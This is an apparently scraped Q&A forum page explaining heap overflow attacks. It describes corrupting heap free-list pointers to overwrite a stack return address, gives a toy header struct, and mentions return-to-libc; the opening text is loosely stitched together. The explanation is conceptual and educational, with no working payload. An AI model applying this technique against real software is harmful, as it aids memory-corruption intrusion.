Menu
How are heap overflow attacks executed?
In the case of stack overflow attacks, the attacker replaces the function return address with his address of choice.
How is this done in the case of a heap overflow attack? Also, is it possible to run code from the heap?
290
Heap overflow attack - This type of attack targets data in the open memory pool known as the heap. Integer overflow attack - When an integer overflows, an arithmetic operation results in an integer (integer) that is too large to store the integer type; this may result in a buffer overflow.
An integer overflow attack can occur when an integer is used in an arithmetic operation and the result of the calculation is a value in excess of the maximum size of the integer. For example, 8 bits of memory are required to store the number 192.
There are two types of buffer overflows: stack-based and heap-based. Heap-based, which are difficult to execute and the least common of the two, attack an application by flooding the memory space reserved for a program.
A heap overflow attack is a type of a buffer overflow attack that specifically targets the heap, as it's name implies. In these attacks the data in the heap is overwritten to exploit some aspect of the program.
Note this varies by platform, and my example is overly simplified. It basically comes down to heap managers having linked lists that could be overrun, and you can use the linked list pointers to overwrite random parts of the process's memory.
Imagine I have a naive heap implementation whose control blocks are like this:
struct HeapBlockHeader
{
HeapBlockHeader* next;
HeapBlockHeader* prev;
int size;
// Actual heap buffer follows this structure.
};
When the heap gets freed, this control block goes back into a list of freed blocks, by modifying the next/prev pointer. If I overrun a heap buffer, I can overwrite the pointers in the next control block with data I control. Suppose I override these links to point to a pointer to code (probably just in the buffer I overran) and to the return address of the function on the stack. When the heap manager tries to link the block back into a freed list, it will actually overwrite the return address on the stack with a pointer to code I control.
This article has a nice overview on heap overflow attacks: http://www.h-online.com/security/features/A-Heap-of-Risk-747161.html
This article describes some of the hardening that went into Vista's heap manager to prevent this sort of attack: http://www.blackhat.com/presentations/bh-usa-06/BH-US-06-Marinescu.pdf
EDIT: On possibility to run code from heap, yes it's possible. Many platforms now make heap memory non-executable by default which raises the barrier to getting arbitrary code to run. However, you can still do a "jump to libc" style attack - Overwrite the return address to a known function which will be executable.
60
If you love us? You can donate to us via Paypal or buy me a coffee so we can maintain and grow! Thank you!
Donate Us With
